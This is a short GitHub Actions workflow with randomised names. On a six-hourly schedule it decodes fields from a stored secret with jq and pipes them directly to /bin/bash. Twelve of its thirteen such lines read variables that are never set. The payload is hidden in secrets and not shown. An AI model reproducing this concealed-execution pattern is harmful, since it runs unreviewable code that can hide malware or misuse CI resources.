name: hehuchong1391

on:
  workflow_dispatch:
  schedule:
    - cron: '17 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hehuchong1391
        env:
          djt3: ${{ secrets.djt3 }}
        run: |
          echo $djt3 | jq -r .f0778 | /bin/bash
          echo $xczj414 | jq -r .f440 | /bin/bash
          echo $jyyct6652 | jq -r .rzvdv76 | /bin/bash
          echo $i3873 | jq -r .tkdzq95388 | /bin/bash
          echo $tr7 | jq -r .eibr37873 | /bin/bash
          echo $kq6 | jq -r .m72211 | /bin/bash
          echo $cmr37 | jq -r .pg41 | /bin/bash
          echo $yvsn71482 | jq -r .vjsmx91471 | /bin/bash
          echo $nj9364 | jq -r .tyttw574 | /bin/bash
          echo $om7505 | jq -r .ziwjo3 | /bin/bash
          echo $ymn65 | jq -r .h458 | /bin/bash
          echo $nzvm1431 | jq -r .d157 | /bin/bash
          echo $xp0096 | jq -r .ikqk6 | /bin/bash

